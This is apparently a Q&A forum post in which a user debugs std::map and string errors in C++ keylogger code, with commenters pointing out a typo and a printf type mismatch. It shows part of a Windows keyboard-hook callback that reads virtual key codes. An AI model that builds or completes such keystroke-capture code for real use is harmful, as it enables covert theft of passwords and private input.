# Using struct std::map in function

Tags: c++

I found this keylogger code for educational purposes that had alot of case statements. So I figured out that I could make a map using std::map. Then place it in a header file that main.cpp could use.

Code links:
keylog.h https://github.com/Rubender353/random/blob/Rubender353-patch-1/c%2B%2B/keylog/keylog.h
keystate.h https://github.com/Rubender353/random/blob/Rubender353-patch-1/c%2B%2B/keylog/keystate.h
main.cpp https://github.com/Rubender353/random/blob/Rubender353-patch-1/c%2B%2B/keylog/main.cpp

keystate.h has a structure that holds key map

```
    struct keystate
    {
        // Create a map shift mapping shift key codes to values
        std::map<int, std::string> shiftKeys { {0x30, ")"}, {0x31, "!"}, {0x32, "@"},
        {0x33,"#"},{0x34,"$"},{0x35,"%"},{0x36,"^"},{0x37,"&"},{0x38,"*"},{0x39,"("}
        };
    };
```

In main.cpp line 130-144. I use keystate struct to make keysmap. I then use keysmap.shiftKeys[vkCodeOut] to access the key value. Which I then just want to print out to see if that part of the code works

```
    // copy vkCode into log buffer
    CHAR key[2];
    DWORD vkCode = kbd->vkCode;
    BOOL chk = AllocConsole();
    freopen("CONOUT$", "w", stdout);
    printf("vkcode is %lu", vkCode);

    // key is 0 - 9
    if (vkCode >= 0x30 && vkCode <= 0x39) {
        if (GetAsyncKeyState(VK_SHIFT)) {
            struct keystate keysmap;
            string vkCodeOut = keysmap.shiftKeys[vkCodeOut];
            printf("vkcode is %c", vkCodeOut);
        }
    }
```

visual studio compiler keeps telling me string is unidentified for vkCodeOUt even though I got right #include string at the top of main.cpp. Also the next print line gives an error of vkCodeOut undeclared identifier.

Comment: Did you mean `std::string`?  But you can't pass a `std::string` to `printf` with `%c`; it expects `int`.

Comment: Yup so i just added iostream and changed it to std::string vkCodeOut = keysmap.shiftKeys[vkCodeOut]; and printf to std::cout << "vkcode is  %s" << vkCodeOut. But now it says no operator [] when that is a operator to get the value of certain key in std::map

Comment: @NerfD `string vkCodeOut = keysmap.shiftKeys[vkCodeOut];` Typo for `[vkCode]`?

Comment: @NerfD You can just do `std::cout << "vkcode is: " <<  vkCodeOut << std::endl;`

Comment: `string vkCodeOut = keysmap.shiftKeys[vkCodeOut];` -> `string vkCodeOut = keysmap.shiftKeys[vkCode];`